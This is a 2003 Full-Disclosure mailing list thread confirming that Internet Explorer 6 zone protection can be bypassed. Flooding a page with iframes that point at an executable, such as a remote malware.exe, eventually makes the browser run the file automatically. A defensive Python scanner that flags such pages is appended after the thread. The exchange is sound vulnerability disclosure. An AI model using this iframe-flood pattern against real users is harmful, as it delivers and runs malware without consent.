[Full-Disclosure] Re: Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! - UPDATED

http-equiv_at_excite.com
Date: 05/15/03

    To: <full-disclosure@lists.netsys.com>
    Date: Thu, 15 May 2003 21:06:39 -0000
    

    Marek,

    Further to my confirmation of seeing this in the past as detailed
    below, I am today delighted to inform you that I can reconfirm that
    it functions precisely as you describe:

    1. Definitely processor related as after 10 minutes of bogging down
    the machine, BANG ! it automatically opened the .exe

    2. Thereon after, all following .exe's are also automatically opened

    Tested on the following page which is nothing more than a sh!tload of:
     
    <iframe src="fooware.exe">'s

    Harmless .exe

    http://www.malware.com/forceframe.html

    Note: may of course be different on other machines [i.e. processor
    power...increase amount of frame 'suppose]

    Well Done ! It's a beauty !

    ======
    I had sent this to bugtraq when you initially posted it, confirming
    having seen it in the past as well. Will try your html file and see
    if can get it up and running again.

    Forwarded From: "http-equiv@excite.com"

    > <!--
    >
    > I've noticed that on my test environment it is possible to bypass
    > Internet Explorer Zones protection by flooding it with large number
    > of file:// requests in example to infected fileserver. The result of
    > this bypass is EXECUTION OF ANY REQUESTED FILE. My requested file
    > was 'trojan.exe' placed on neighbour WIN2K Professional workstation.
    > To see code used during the test check files in attached archive.
    >
    > On IE 6.0 the result was always the same, after more than 200 dialog
    > boxes with 'trojan.exe' request, suddenly requested file got executed
    >
    > -->
    >
    > Excellent. Can confirm seeing this happen twice in the past two
    > years. Both in Internet Explorer and Outlook Express, using an iframe
    > and a remote executable on the server e.g. <iframe
    > src="http://...../malware.exe"> multiple instances on one page. One
    > slipped through and the file was executed automatically.
    >
    > Not been able to replicate since though.
    >
    > May be a combo machine power and 'confusing' IE [easier].
    >
    >
    > --
    > http://www.malware.com
    >
    >

    -- 
    http://www.malware.com
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
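
A defensive check for the page pattern described in this thread, as an added example that is not part of the original posts: it counts frames whose src points at an executable and flags a page that carries many of them. The extension list, the threshold of 20 and the sample pages are assumptions constructed for illustration.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumptions for this example: which extensions count as executable, and how
# many executable-targeted frames on one page are treated as a flood.
EXEC_EXTS = (".exe", ".com", ".scr", ".pif", ".bat")
FLOOD_THRESHOLD = 20


class FrameCollector(HTMLParser):
    """Collects the src of every <iframe>/<frame> (HTMLParser lowercases names)."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "frame"):
            src = dict(attrs).get("src")
            if src:
                self.targets.append(src.strip())


def is_executable_target(src):
    """True when the URL path (not the host name) ends in an executable extension."""
    try:
        # Normalise backslashes so UNC-style paths are split like URLs.
        path = urlsplit(src.replace("\\", "/")).path
    except ValueError:  # malformed URL
        return False
    return path.lower().endswith(EXEC_EXTS)


def scan_page(html, threshold=FLOOD_THRESHOLD):
    """Count executable-targeted frames and flag the page at or above threshold."""
    collector = FrameCollector()
    collector.feed(html)
    collector.close()
    hits = Counter(t for t in collector.targets if is_executable_target(t))
    total = sum(hits.values())
    return {"exec_frames": total, "distinct_targets": len(hits), "flagged": total >= threshold}


# Constructed sample pages (not taken from the original post).
FLOOD_PAGE = "<html><body>" + '<IFRAME SRC="fooware.exe"></IFRAME>' * 30 + "</body></html>"
BENIGN_PAGE = ('<html><body><iframe src="http://example.com"></iframe>'
               '<a href="setup.exe">download</a></body></html>')
```

A mail or web gateway could run scan_page over inbound HTML and quarantine or strip flagged content before it reaches the client.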
    
